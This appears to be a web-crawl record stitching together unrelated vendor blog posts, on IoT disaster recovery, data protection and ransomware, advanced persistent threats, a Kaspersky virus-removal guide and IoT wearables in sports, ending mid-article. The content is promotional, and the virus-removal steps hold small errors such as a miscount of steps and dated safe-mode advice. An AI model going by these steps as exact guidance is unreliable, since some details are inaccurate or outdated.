Cybersecurity is becoming more and more important as technology continues to advance. MFA isn’t just important for companies to implement to protect their customer’s personal information, but also important for individuals to implement to strengthen their own online security. | <urn:uuid:b091661a-aca2-4769-a7c6-14eabb68c95b> | CC-MAIN-2024-38 | https://www.keepersecurity.com/blog/2022/12/20/the-benefits-of-multi-factor-authentication/ | 2024-09-14T23:43:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00656.warc.gz | en | 0.94566 | 1,295 | 3.171875 | 3 |
IoT Devices and Cyber Disaster Recovery: What You Need to Know
The practical corporate executive plans for the worst while hoping for the best. When disaster takes systems offline, organizations need to have a streamlined recovery process in place. When a catastrophic event occurs, a company’s disaster recovery plan provides IT teams with a roadmap to restore services and operations as quickly as possible. As organizations incorporate more Internet of Things (IoT) devices into their business, they are required for any disaster recovery strategy that restores full operations.
However, IoT devices create unique disaster recovery challenges. Typically, restoring these devices resets factory settings, which means that getting operations back to their original state requires reconfiguring and recalibrating them in a specific order. The time it takes to get these devices back to optimal conditions increases recovery costs and strangles the organization’s ability to get back online quickly. In fact, according to Gartner, 70% of organizations are poorly positioned in terms of disaster recovery, with 54% likely suffering from “mirages of overconfidence.”
By incorporating IoT devices into disaster recovery plans, organizations can create a holistic, more effective strategy that reduces business interruption costs and improves overarching operational efficiency. Further, it increases their odds of staying in business after a disaster. Not all businesses do recover.
What is a Disaster Recovery Plan?
A disaster recovery plan consists of the documented policies and processes that an organization uses to quickly resume operations after an unplanned natural or human-induced event disrupts them.
Examples of disasters include:
- Natural Events: earthquakes, floods, hurricanes, wildfires
- Cyberattacks: ransomware, malware, DDoS
- Technology Failure: hardware, equipment, power outages
- Intentional Attacks: terrorism, sabotage
The disaster recovery plan outlines the steps required to address the emergency effectively, providing a systematic approach for how to proceed with or resume critical operations. These structured processes enable the organization to efficiently allocate resources to recover data and reestablish information system functionality after a catastrophic event.
What Is the Difference Between Disaster Recovery and Business Continuity?
Although disaster recovery and business continuity are related, they focus on different aspects of the organization’s operations:
- Disaster Recovery: Restoring IT infrastructure and data access to get critical systems and applications online as quickly as possible
- Business Continuity: Taking proactive measures to ensure essential functional operations can continue, including broader concerns like opening physical offices or branches as quickly as possible
Why is Disaster Recovery Important?
A well-structured disaster recovery plan enables organizations to respond to events promptly, limiting their financial impact. Some specific benefits include:
- Ensuring Business Continuity: Modern functional business operations rely on applications and data, even ones located in physical offices.
- Enhancing System Security: Data backup and other disaster recovery processes correlate to cybersecurity protections.
- Improves Customer Retention: Reducing business and service outage times builds customer trust and loyalty.
- Reduces Recovery Costs: Getting operational services back online faster reduces costs arising from business revenue and lack of productivity.
Elements of a Disaster Recovery Strategy
A robust disaster recovery strategy enables organizations to proactively prepare for the worst outcomes for enhanced resiliency.
A comprehensive asset inventory identifies all of the hardware, software applications, and data crucial to business functions. With a list of critical data and applications, IT teams can:
- Backup data for faster restoration
- Replicate and re-image new hardware quickly
- Re-install software on replacement equipment
The organization’s risk analysis should consider various risks, including geographic location and system vulnerabilities. For example, an organization with headquarters in a landlocked area is less likely to experience a flood. Meanwhile, an organization that engages in regular vulnerability scans and updates operating systems and software reduces data breach risks.
Business Impact Analysis
A business impact analysis (BIA) reviews disaster scenarios to anticipate potential business operations impact. The process helps:
- Identify critical functions
- Determine acceptable downtimes
- Understand the consequences of various types of disasters
Classifying IT assets as mission-critical, important, or non-essential enables the organization to prioritize recovery activities. With policies and processes that restore critical assets first, organizations can return to near-normal business operations faster. When determining benchmarks for restoring critical systems, organizations can use the following metrics:
- Recovery Time Objective: how much time elapses before application, system, and process outage damages the business
- Recovery Point Objective (RPO): how recent data needs to be when recovered after an outage before damaging the business
Documenting the relationships between different systems and processes identifies interdependent systems and reduces business disruption by accounting for these relationships. Organizations should carefully map out these dependencies so they can coordinate recovery across the IT environment.
Verification of Readiness
Testing the organization’s disaster recovery processes and practices is critical. While everyone hopes to avoid a catastrophic event, they occur, as evidenced by the COVID-19 pandemic lockdowns.
Organizations should test their incident response and disaster recovery processes to mitigate risks and reduce errors. For example, reviewing IT and Internet of Things (IoT) assets’ configurations can help avoid errors before declaring that a recovery point has been reached.
Holistic Disaster Recovery Includes IoT Devices
Increasingly, IoT devices are assets critical to the organization’s business operations. From the Internet of Medical Things (IoMT) devices that support patient care to the Internet of Industrial Things (IIoT) that support critical infrastructure employees, these difficult-to-manage and secure devices should be included in the organization’s disaster recovery plan.
Organizations need insight into the devices they have and how critical they are to continued operations. IoT devices connect to networks, but traditional IT scanning solutions can take them offline. Organizations need passive scanners that detect devices and supply the following information about them:
- Hardware: manufacturer, model, serial number
- Software: operating system, version, firmware revisions
- Device type and function
- Security assessment: vulnerabilities and risks
Analyze Risk and Simulate Risk Scenarios
IoT risk modeling enables organizations to consider hypothetical situations that ultimately result in reduced downtime and improved resilience. Organizations should look for IoT solutions that understand the risks and threats that their industry faces. When searching for an IoT risk modeling solution, organizations should look for ones that provide:
- Device risk scores: insights into the risks that the device poses and what would happen in the event of a service outage
- Remediation risk simulation: understanding the different activities that reduce risk by simulating different strategies and options
- Overall organization risk: visibility into dependencies and their impact on business operations
Identify Vulnerabilities and Prioritize Remediation Activities
Organizations need to include cyberattacks, like ransomware attacks, as part of their disaster recovery plan. To proactively mitigate risks, they need passive scanning technologies that identify vulnerabilities and risky devices. Any IoT vulnerability management solution should:
- Identify where exploitable vulnerabilities are within the environment and for each specific device
- Prioritize activities on real-time exploitability
- Provide actionable remediation recommendations that include applying security updates or implementing appropriate compensating controls, like deactivating unnecessary services or implementing microsegmentation
- Understand dependencies such as the correct sequence of activities that can conflict, such as firmware upgrades and making configuration changes. The same actions – in the wrong order – may not result in a restored device that would match earlier snapshots of its configuration.
Understand Normal and Anomalous Behavior
Without understanding how IoT devices act normally, organizations have no baseline for how to define abnormal behavior. Detecting and analyzing anomalous IoT device behavior enables organizations to prevent service disruptions arising from cyberattacks or misconfigurations. With visibility into this, companies can take proactive steps to mitigate technology risks that disrupt business operations.
Detect and Investigate Incidents
By incorporating IoT devices in their disaster recovery plan, organizations can complete business-critical investigations faster. From cyberattacks to devices falling offline from a misconfiguration, IoT solutions should help recovery activities by providing forensic data like:
- RAM from servers
- Traffic information from network devices
- Data transferred to an FTP server
Asimily: Improve Disaster Recovery by Including IoT
Asimily provides holistic context into an organization’s environment when calculating Likelihood-based risk scoring for devices. Our vulnerability scoring considers the compensating controls so you can more appropriately prioritize remediation activities.
Organizations efficiently identify high-risk vulnerabilities with our proprietary, patented algorithm that cross-references vast amounts of data from resources like EPSS (Exploit Prediction Scoring System), Software Bills of Material (SBOMs), Common Vulnerability and Exposure (CVE) lists, the MITRE ATT&CK Framework, and NIST Guidelines. It understands your unique environment, so our deep contextual recommendation engine can provide real-time, actionable remediation steps to reduce risk and save time.
Asimily customers are 10x more efficient because the engine can pinpoint and prioritize the top 2% of problem devices that are High Risk (High Likelihood of exploitation and High Impact if compromised). Asimily’s recommendations can easily be applied in several ways, including through seamless integration with NACs, firewalls, or other network enforcement solutions.
To learn more about Asimily, download our IoT Device Security in 2024: The High Cost of Doing Nothing whitepaper or contact us today.
Reduce Vulnerabilities 10x Faster with Half the Resources
Find out how our innovative risk remediation platform can help keep your organization’s resources safe, users protected, and IoT and IoMT assets secure. | <urn:uuid:4be6b136-9663-4847-8869-7212f7bac0d8> | CC-MAIN-2024-38 | https://asimily.com/blog/iot-devices-and-cyber-disaster-recovery/ | 2024-09-17T12:36:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00456.warc.gz | en | 0.912383 | 1,988 | 2.515625 | 3 |
By Edwin Weijdema, Global Technologist, Product Strategy at Veeam
Disinformation is undermining the limitless potential of technology to be a positive force for industries, businesses and communities.
In the current global landscape, barely a conversation goes by without mention of “fake news” and its ability to mislead critical discourse regarding events such as elections and current affairs around the world.
Combined with the fact that the definition of privacy is constantly being redefined in the age of ‘surveillance capitalism’, this means it’s a not-so-metaphorical minefield out there when it comes to safeguarding our data.
In light of this, the onus is increasingly on data protection and cybersecurity technologies to protect the integrity of our human rights in the face of cyber information warfare. But businesses too must ensure they remain on the right side of using data ethically, compliantly and securely.
Data Protection Day is an opportunity to explore some of the technologies leading the way in the fight against cyber (dis)information and how businesses can take up arms to protect our rights as employees, consumers, and citizens.
Data protection as a human right
Unbeknown to some, data protection is a human right. In Europe, it’s for this reason that we celebrate Data Protection Day, which this year marks the 40th anniversary of the Council of Europe’s Convention for the Protection of Individuals with Regard to the Automatic Processing of Personal Data.
Or in short – Convention 108: the treaty that spawned the first European Union-wide data protection laws, which is today covered within the General Data Protection Regulation (GDPR).
Despite the significant financial and reputational damage for failing to protect this basic human right, it’s data protection, or rather a lack of, which continues to grab headlines.
Fortunately, data protection and cybersecurity technologies are striving to change this.
Technology: a vital weapon in the fight against cyber information warfare
A lot has been said about technology’s role as an enabler for spreading disinformation and inciting cyber information warfare. But more vitally, it’s our biggest weapon in the fight against cybercriminals.
This is particularly true with its role as a guardian against a choice weapon of cybercriminals. Ransomware is a maliciously created malware that encrypts files and storage. It is one of the most intractable and common threats facing organisations across all industries and geographies.
Predominantly, attackers use ransomware to extort money. But many attacks also seek out production and backup files, as well as documents. By encrypting those too, the attack leaves organisations with no choice but to meet the demands of cybercriminals.
By the end of 2021, the global cost of ransomware damage is predicted to reach $20 billion (USD), according to the 2019 Veeam Ransomware Study. But more damaging still is the countless violations of human rights as ransomware attackers increasingly threaten to leak stolen data.
To combat this – and the rising challenges of cybercriminals working together – it’s important for technology to form its own armies and alliances, such as the ransomware protection alliance Veeam has formed with a number of partners including: Cisco, AWS, Lenovo, HP and Cloudian.
But of course, cybercriminals are always seeking new and innovative ways to steal data and since the start of COVID-19, businesses haven’t been the only ones accelerating their digital transformation – with cyberattacks on cloud systems spiking 250% from 2019 to 2020.
In response, it’s more important than ever to work with technology partners that not only prioritise the data management needs of today, but are also looking to the cloud and security solutions of tomorrow – all the while remaining one step ahead of cybercriminals.
Using data ethically, compliantly and securely
In this digital age, businesses have more responsibility than ever to use data ethically, compliantly and securely. Doing so is not a nice-to-have or something that sits atop a business agenda. It’s a human right!
But still, too many businesses are inadvertently aiding the efforts of cybercriminals with their lackadaisical approach to data security. In a recent article, Mohamed al-Kuwaiti, head of UAE Government Cyber Security was quoted saying that ‘the Middle East region is facing a “cyber pandemic” with Covid-19 related attacks skyrocketing in 2020’. Trend Micro recorded over 50m cyber-attacks in the GCC region during the first half of 2020.
Fines and reputational damage are of course deterrents. However, we’re still seeing too many data breaches and businesses must do more to curb the plight of data protection. To this end, technology is once again a key enabler.
Regardless of your business size, find a solution that ensures data security, compliance and customer privacy requirements are met. Don’t just take a vendor’s word that their solutions are secure – read customer testimonials, do your research and look to respected rewards bodies.
In the business year ahead, maintaining customer trust will be a core priority – there’s enough going on in the world for them to also be worrying about the welfare of their data, after all.
So, putting your trust in the right technology can help uphold our human rights and take giant strides in the war against cybercriminals.
About the Author
Edwin Weijdema is a Global Technologist for Veeam Software based in The Netherlands covering a global role within the Product Strategy team. He serves as a partner and trusted adviser to customers and partners worldwide bridging business and technology. He has over 28 years of industry experience with a key focus on data management, availability and cyber security. He is a veteran vExpert, Cisco Champion and holds several other certifications. He is also a crew member and blogger at www.vmguru.com | <urn:uuid:44f66d99-b9b0-42cc-a217-3ab8b3c920cb> | CC-MAIN-2024-38 | https://www.cyberdefensemagazine.com/protecting-human-rights/ | 2024-09-17T13:05:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651773.64/warc/CC-MAIN-20240917104423-20240917134423-00456.warc.gz | en | 0.938855 | 1,237 | 2.578125 | 3 |
It seems that lately, threats that were once were simply known as “malware” or “viruses” have been elevated to the status of Advanced Persistent Threat (APT), a term that has strategically been used to strike fear in the hearts of consumers.
These days, APTs have a much more common presence in the media, and some of the most notorious have included major global threats such as Ghostnet (a botnet deployed in various offices and embassies to monitor the Dalai Lama agenda), Shady RAT (like Ghostnet but with government and global corporate targets), Operation Aurora (a threat that monitored Chinese dissidents’ Gmail accounts in 2009) and Stuxnet (an attempt to disrupt Iran’s uranium enrichment program) in 2010.
And in recent months, APTs have become so pervasive and unrelenting that they are forcing enterprises to question the current security paradigm and change their approach to network and data defenses.
Meanwhile, the APT term has of late been used so frequently by security researchers and media alike that few can deny it has officially been distilled into the category of “buzz word.”
Yet, what exactly does the term APT mean? How exactly does this kind of threat differ from any other ordinary Trojan or worm? And what can users do to protect themselves?
Here is a close-up look at APTs, with information provided by the FortiGuard research team. Let’s break it down.
Advanced: Ultimately, what defines APTs is their ability to use sophisticated technology and multiple methods and vectors to reach specific targets and obtain sensitive or classified information. Safe to say, these threats are not your mama’s teenage hacker in the basement. Instead, the operators behind APTs run highly organized teams of experts and have multiple intelligence gathering techniques at their disposal. The teams often employ malware to hunt and phish for specific information that targets individuals, which is then used as part of a second stage attack. From there, the APT often relies on social engineering techniques in hopes of infiltrating an organization at its weakest point-the end user. While some methods throughout the overall attack process are more advanced than others, the threat operators often incorporate technologically sophisticated Trojans, worms and other malware to ultimately achieve their malicious aims.
Persistent: Among other things, APTs are known for taking their time, and they just don’t ‘go away.’ In short, operators behind the threat are more interested in reaching their targets as opposed to seeking information opportunistically just for financial gain. Unlike your run-of-the-mill botnet, APTs tend to remain under the radar as long as possible, typically employing a “low and slow” attack strategy that focuses on moving stealthily from one host to the next without generating significant network traffic or otherwise bringing attention to themselves. The protracted stealth enables the threat to hunt for its assigned target, which could be anything from intellectual property, classified government data or sensitive personal information on high profile victims.
Threat: No doubt, APTs are a bona fide threat due to their capability and intent to impose a large amount of damage on their intended targets. Also, there is significant human intelligence behind APTs, as opposed to malware comprised of an automated piece of code. In fact, more often than not, an APT is backed by an organized, highly skilled, and well-funded team of individuals that have the ability to hone in on targets and achieve their objectives. Now, that’s a threat.
While by definition, APTs might seem impenetrable and impossible to evade, there are ways that users can put the odds in their favor should the need arise.
Maintain Up-To-Date Systems: At the very least, organizations need to make the zero-day window as short as possible by staying on top of the latest security patches and updates. IT-wide signature maintenance is also necessary for reducing the vulnerability risk.
Adopt An “Intelligently Redundant” Security Strategy: There is no one silver bullet or magic pill that will eradicate the risk of APTs. However, organizations can put the odds in their favor by adopting a multi-layer, multi-faceted defense strategy. While antivirus and firewalls are necessary, they are just the beginning of a comprehensive and effective security posture. That holistic strategy should also include Data Loss Prevention technologies, combined with robust data leakage and role-based security policies. Meanwhile, in addition to antispam and Web filtering solutions, enterprises also need to implement application control mechanisms in order to block APTs at various stages of the attack process.
Remember, the biggest rule of thumb is that no one security solution is bulletproof, but layering security mechanisms intelligently while staying educated on best security practices gives users a big leg up in the fight.
Stefanie HoffmanLeave a reply | <urn:uuid:d689bd64-2f5d-4efb-be64-7de627efdc9e> | CC-MAIN-2024-38 | https://dataprotectioncenter.com/security/advanced-persistent-threats-a-breakdown/ | 2024-09-19T23:30:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652073.91/warc/CC-MAIN-20240919230146-20240920020146-00256.warc.gz | en | 0.96099 | 1,006 | 2.765625 | 3 |
How do computer viruses work?
Are you concerned that your computer may have a virus? If your computer is infected, learning how to get rid of a computer virus is vital.
This article teaches you all there is to know about how computer viruses work and computer virus removal.
Read on as we discuss:
- How to get rid of a computer virus.
- What a computer virus is.
- How to tell if your computer has a virus.
- Whether your computer can become infected with a virus via email.
- How to protect your computer from viruses.
How to get rid of a computer virus
In this section, we explore how to get rid of a computer virus from a PC and from a Mac.
Removing a computer virus from a PC
Computer viruses are almost always invisible. Without anti-virus protection, you may not know you have one. This is why it is vital to install anti-virus protection on all your devices.
If your PC has a virus, following these ten simple steps will help you to get rid of it:
Step 1: Download and install a virus scanner
Download a virus scanner or complete internet security solution. We recommend Kaspersky Internet Security. The video below will guide you through the installation process:
Step 2: Disconnect from internet
When you are removing a virus from your PC, it is a good idea to disconnect from the internet to prevent further damage: some computer viruses use the internet connection to spread.
Step 3: Reboot your computer into safe mode
To protect your computer while you remove the virus, reboot it in ‘Safe Mode’. Are you unsure of how to do this?
Here is a simple guide:
- Turn your computer off and on again
- When the screen lights, press F8 to bring up the ‘Advanced boot options’ menu
- Click ‘Safe Mode with Networking’
- Remain disconnected from the internet
Step 4: Delete any temporary files
Next, you need to delete any temporary files using ‘Disk Clean Up’.
Here’s how to do this:
- Click the Windows logo on the right bottom
- Type “Temporary Files”
- Choose “Free up disk space by deleting unnecessary files”
- Find and select “Temporary Internet Files” in the ‘Files to delete’ Disk Cleanup list and click OK
- Confirm “Delete Files” selection
Some viruses are programmed to initiate when your computer boots up. Deleting temporary files may delete the virus. However, it is not safe to rely on this. To ensure you rid your computer of viruses, it is wise to complete the following steps.
Step 5: Run a virus scan
Now it is time to run a virus scan using your chosen anti-virus or internet security software. If you are using Kaspersky Internet Security, select and run ‘Scan’.
Step 6: Delete or quarantine the virus
If a virus is found, it may affect multiple files. Select ‘Delete’ or ‘Quarantine’ to remove the file(s) and get rid of the virus. Rescan your computer to check there’s no further threats. If threats are found, quarantine or delete the files.
Step 7: Reboot your computer
Now that the virus is removed, you can reboot your computer. Simply turn it on as you would normally. It no longer needs to be in ‘Safe Mode’.
Step 8: Change all your passwords
To protect your computer from further attack, change all your passwords in case they were compromised. This is only strictly necessary if you have reason to believe your passwords have been captured by malware, but it is better to be safe than sorry.
You can always check the virus’s functionality on your anti-virus vendor’s website or with their technical support team if unsure.
Step 9: Update your software, browser and operating system
Updating your software, browser and operating system will reduce the risk of flaws in old code being exploited by criminals to install malware on your computer.
Removing a computer virus from a Mac
If you use a Mac, you may be under the impression that your computer cannot get a virus. Unfortunately, this is a misconception. There are fewer viruses that target Macs compared with the many that target PCs, but Mac viruses do exist.
Some Mac viruses are designed to trick users into thinking they are anti-virus products. If you accidentally download one of these, your computer may be infected. Three examples of Mac viruses of this type are ‘MacDefender’, ‘MacProtector’, and ‘MacSecurity’.
If you think your Mac has a virus, here are six steps to follow to remove it:
- Quit the application or software that seems to be affected.
- Go to ‘Activity monitor’ and search for known Mac viruses such as ‘MacDefender’, ‘MacProtector’, or ‘MacSecurity’.
- If you find one of these viruses, click ‘Quit process’ before quitting ‘Activity monitor’.
- Next, go to your ‘Applications’ folder and drag the file into your ‘Trash’.
- Remember to empty the ‘Trash’ folder afterwards to permanently delete the virus.
- Now make sure your software and apps are up to date to benefit from the latest security patches.
To ensure nothing is missed and to keep your Mac protected, consider installing a running an anti-virus solution if you do not already have one. We recommend comprehensive internet security solution like Kaspersky Total Security.
What is a computer virus?
A computer virus is a type of malware (malicious software) designed to make self-replicate, i.e. to make copies of itself on any drive connected to your computer.
Computer viruses are so-called because, like real viruses, they can self-replicate. Once your computer is infected with a virus, this is how it spreads. When a computer virus infects your computer, it may slow it down and stops it working properly.
There are three main ways that your computer may have become infected with a computer virus.
The first way your computer could become infected from removable media, like a USB stick. If you insert a USB stick or disk into your computer from an unknown source, it may contain a virus.
Sometimes hackers leave infected USB sticks or disks in people’s workplaces, or public places like cafes to spread computer viruses. People sharing USBs may also transfer files from an infected computer to one that isn’t infected.
Another way your computer become infected with a virus is through a download from the internet.
If you are downloading software or apps to your computer, ensure you do so from a trusted source. For example, the Google Play Store or Apple’s App Store. Avoid downloading anything via a pop-up or a website you do not know.
The third way your computer could become infected with a virus is if you open an attachment, or click on a link, in a spam email.
Whenever you receive mail from a sender you do not know or trust, avoid opening it. If you do open it, do not open any attachments or click on any links.
How to tell if your computer has a virus
There are numerous signs to look out for that indicate your computer may have a virus.
Firstly, is your computer slowing down? If everything is taking longer than usual, your computer may have become infected.
Secondly, look out for apps or programs that you do not recognize. If you see an app or a program appear on your computer that you do not remember downloading, exercise caution.
It is a good idea to uninstall any software you do not recognize and then to run a virus scan using anti-virus or internet security software to check for threats. Pop-ups that appear when your browser is closed are a tell tail sign of a virus. If you see these, take immediate action to remove the virus, by following the steps outlined above.
Another sign that your computer may have a virus is if apps or programs on your computer start behaving strangely. If they start crashing for no apparent reason, your computer may have a virus.
Finally, a virus may cause your computer to start overheating. If this happens, investigate whether you have a virus using anti-virus or internet security software.
Can your computer become infected with a virus via email?
Your computer can become infected with a virus via email, but only if you open attachments within a spam email or click on the links contained in them.
Simply receiving a spam email will not infect your computer. Just mark these as spam or junk and ensure they are deleted. Most email providers will automate this (Gmail for example) but if any slip through the net, just mark them as spam yourself and don’t open them.
How to protect your computer from viruses
Here are some key ways that you can protect your computer from viruses:
- Use anti-virus software or a complete internet security solution, like Kaspersky Total Security. For your Android mobile, consider Kaspersky Internet Security for Android.
- Research apps and software by reading user reviews.
- Read developer descriptions before you download apps and software.
- Only download apps and software from trusted sites.
- Check how many downloads apps and software have. The more, the better.
- Check what permissions apps and software ask for. Are these reasonable?
- Never click on unverified links in spam emails, messages or unfamiliar websites.
- Do not open attachments in spam emails.
- Keep software, apps and your operating system updated.
- Use a secure VPN connection for public Wi-Fi, like Kaspersky Secure Connection.
- Never insert unknown USB sticks or disks into your computer.
Why expose yourself to the risk of infection? Protect your computer with Kaspersky Total Security.
Kaspersky Internet Security received two AV-TEST awards for the best performance & protection for an internet security product in 2021. In all tests Kaspersky Internet Security showed outstanding performance and protection against cyberthreats. | <urn:uuid:d201eb21-003f-44cd-ad28-dc995d75b256> | CC-MAIN-2024-38 | https://www.kaspersky.com.au/resource-center/threats/how-to-get-rid-of-a-computer-virus | 2024-09-07T20:07:26Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650920.0/warc/CC-MAIN-20240907193650-20240907223650-00456.warc.gz | en | 0.928369 | 2,141 | 3 | 3 |
Cloud computing is on the list of 12 disruptive technologies that may change the world. According to investopedia.com; Disruptive technology is an innovation that significantly alters the way that consumers, industries, or businesses operate. A disruptive technology sweeps away the systems or habits it replaces because it has attributes that are recognizably superior. Now the question, is cloud computing a disruptive technology?
The McKinsey Global Institute released a research report, announcing the next 12 disruptive technologies that may change lives, businesses, and the global economy.
These technologies are expected to bring economic benefits of US$14 trillion to US$33 trillion in 2025. The research report selects 12 technologies with economic benefits from 100 technologies, and then analyzes the possible applications of these technologies.
Also, it will note the value they can create, and ranks them in terms of economic benefits. The report estimates that global economic output in 2025 will be 100 trillion US dollars.
Let’s see what these Technologies are:
Name: Mobile Internet
The applied technologies include wireless technology, small, low-cost computing and storage equipment, advanced display technology, natural user interface, and advanced but low-cost batteries.
It can be used to improve labor productivity, remote monitoring system, and reduce the cost of treating chronic diseases. It is estimated that the mobile Internet will bring economic benefits of US$3.7 trillion to US$10.8 trillion in 2025.
Second place: Automation of knowledge work
For example, using intelligent software systems to replace humans to handle customer service calls. It is estimated that the technology can bring economic benefits of US$5.2 trillion to US$6.7 trillion.
Third place: Internet of Things
Embedded sensors in objects to monitor the flow of products in the factory.
Fourth place: cloud computing
Manufacturers can provide services through the Internet, and can also enhance the productivity of corporate information technology.
Fifth place: Robotics
In the future, robots will develop more sensitive, dexterous, and intelligent, and can perform tasks that were considered too detailed or uneconomical. If used in medicine, robotic surgery systems can reduce risks, and robotic prostheses can restore limb functions to amputees or the elderly.
Sixth place: Automatic or semi-automatic navigation and driving vehicles
In addition to convenience, it can also avoid serious traffic accidents and save 30,000 to 150,000 lives.
Seventh place: Next-generation genomics
Complete genome sequencing at a fast and low cost, and perform advanced analysis for synthetic biology, which can be used to treat diseases, develop agriculture, and produce high-value substances.
Other technologies ranked eight to twelve include energy storage, 3D printing, stronger and more conductive advanced materials, oil and gas exploration and discovery, and renewable energy.
Big Data is not listed as an independent technology in the report. McKinsey explained that Big Data is the cornerstone of many of these 12 technologies. Including automatic chemical make, robotics, genomics and ultimately big data use.
Topics related to Disruptive Technologies
- disruptive technology examples
- disruptive technology examples 2020
- list of disruptive technologies
- disruptive technology pdf download
- disruptive innovation examples 2021
- emerging and disruptive technologies
- disruptive innovation ppt
- disruptive innovation companies
The report calls for business leaders to continuously update organizational strategies while technology continues to evolve to ensure that the company remains forward-looking and use technology to enhance internal performance.
For enterprises, disruptive technology can reverse the market situation, create brand-new products and services, and bring new business opportunities. Decision makers can use advanced technology to deal with operational difficulties, such as using the Internet of Things to improve infrastructure management, or using the mobile Internet to create new education and training systems to make public services more efficient. | <urn:uuid:59b18153-97f6-43d5-be26-49ba5c065f40> | CC-MAIN-2024-38 | https://hybridcloudtech.com/is-cloud-computing-a-disruptive-technologies-that-may-change-the-world/ | 2024-09-10T07:51:21Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00256.warc.gz | en | 0.913972 | 778 | 2.921875 | 3 |
A New Era of Sports Innovation
I hope you enjoyed Super Bowl LVIII, it was the longest Super Bowl, and the second Super Bowl that went into overtime. If you watch NFL football regularly, you'll have noticed an increasing number of smart devices. In this blog, we'll dive deeper to find out how IoT technology is deployed in sports. IoT technology integrates smart devices and sensors across various platforms, revolutionizing sports by enhancing performance analysis, safety measures, and fan engagement. It provides real-time data and insights, enabling optimization of athletes' capabilities and strategies. In both American football and soccer, IoT technology is integrated through wearable devices and sensors in equipment to monitor athletes' performance and health metrics in real time. This aids in optimizing training, enhancing player safety, and improving game strategies, marking a significant evolution in how sports leverage technology for competitive advantage and player well-being.
The Game Changer: IoT in Enhancing Player Performance and Safety
Wearable devices and IoT technologies, complemented by data analytics, are integral in monitoring athlete health, safety, and performance across all stages of sports involvement—training, in-game, and post-game recovery to injury rehabilitation. Notable wearable devices, such as smart mouthguards equipped with accelerometers, play a crucial role by detecting head impacts and providing real-time alerts on high-magnitude impacts to coaches and medical staff, thus offering vital insights for managing player welfare. Similarly, vests that monitor vital data, like heart rate and body temperature during physical activities, enable adjustments in training intensity based on real-time data to prevent overexertion and maintain athletes within healthy physiological limits.
Injury Prevention and Recovery: Data-Driven Strategies
Data analytics plays a pivotal role in both injury prevention and recovery for athletes. Let’s explore how:
- Injury Prevention:
- Risk Assessment: Data analytics allows teams to identify patterns and risk factors associated with injuries. By analyzing historical data, teams can predict which players are more susceptible to specific injuries.
- Load Management: Monitoring training load, practice intensity, and game participation helps prevent overuse injuries. Analytics help coaches adjust training regimens based on individual player data.
- Biomechanics Analysis: Data from wearable sensors and video analysis provide insights into movement patterns. Coaches can correct faulty mechanics to reduce injury risk.
- Early Warning Systems: Real-time monitoring of player vitals and performance metrics alerts medical staff to potential issues. Quick intervention can prevent minor injuries from escalating.
- Injury Recovery:
- Individualized Rehabilitation Plans: Analytics guide personalized recovery plans. By considering player-specific data (such as muscle strength, flexibility, and recovery rates), medical staff tailor rehab exercises.
- Return-to-Play Decisions: Data-driven assessments determine when an injured player is ready to return. Objective criteria, such as strength benchmarks or movement quality, guide decisions.
- Tracking Progress: Analytics track recovery milestones, ensuring players meet targets. Adjustments can be made based on progress.
- Psychological Well-being: Monitoring mental health data helps address emotional aspects of recovery, promoting overall well-being.
Environmental monitoring across all phases assesses conditions like air quality and temperature, influencing training and performance. Together, IoT technologies and data analytics offer a comprehensive ecosystem for enhancing athlete performance and safety, providing personalized training and recovery plans, enabling immediate injury intervention, and facilitating strategic decisions tailored to each athlete's unique needs.
The Arsenal of IoT: Tools Transforming Athlete Monitoring
The integration of wearable devices and Internet of Things (IoT) technologies in sports represents a significant leap forward in monitoring and enhancing athlete health, safety, and performance. These tools not only provide real-time data during various stages of sports involvement, including training, competition, and recovery, but also play a pivotal role in injury prevention and rehabilitation. Here's an overview of various types of IoT devices used in sports to monitor an athlete's health and performance:
- Smart Mouthguards: Equipped with accelerometers and gyros, smart mouthguards are critical for detecting head impacts. They can measure the force and direction of impacts, providing immediate data to coaches and medical staff to help prevent concussions and manage head injuries effectively.
- Wearable Fitness Trackers: These devices monitor general health metrics such as steps taken, calories burned, and overall activity levels. Advanced models also track sleep patterns and heart rate variability, offering insights into recovery and readiness.
- Smart Vests and Shirts: Embedded with sensors, these garments track vital data like heart rate, body temperature, and respiratory rate during physical activities. This information is crucial for tailoring training programs to individual athletes, preventing overexertion, and ensuring athletes operate within optimal physiological parameters.
- GPS Trackers: Worn by athletes, these devices provide data on speed, distance, and player positioning. This information is invaluable for sports science teams to analyze performance, manage workloads, and develop strategies that optimize athlete output while minimizing injury risk.
- Wearable Biomechanical Devices: These devices measure an athlete's movements, providing data on posture, stride length, and biomechanics during physical activity. Such insights are essential for identifying and correcting inefficiencies or imbalances in an athlete's technique to improve performance and reduce injury risk.
- Smart Footwear: Equipped with pressure sensors and accelerometers, smart shoes offer detailed feedback on an athlete's gait, impact force, and balance. This data can be used to prevent injuries related to poor biomechanics and to design personalized training and rehabilitation programs.
- Sleep Monitoring Devices: While not exclusive to sports, these devices are increasingly used by athletes to track sleep duration, quality, and patterns. Understanding sleep's critical role in recovery, teams use this data to optimize rest schedules, thus enhancing performance and well-being.
- Hydration and Nutrition Trackers: Some wearable devices and smart bottles monitor hydration levels and nutrition, sending reminders and recommendations to ensure athletes maintain optimal hydration and nutrient intake for peak performance and recovery.
- Smart Watches and Bands: Offering a compact and versatile platform, these devices track a wide range of health metrics, including heart rate, oxygen saturation, and stress levels. They are also used for communication and emergency alerts, adding a layer of safety for athletes during training and competitions.
These devices, often interconnected through cloud computing and advanced data analytics platforms, enable a comprehensive and nuanced understanding of an athlete's health, performance, and recovery needs. By leveraging the vast amounts of data generated by these IoT devices, coaches, medical professionals, and athletes themselves can make informed decisions that enhance performance, prevent injuries, and support long-term athlete development.
Spotlight on Smart Mouthguards: The Frontline of Player Safety
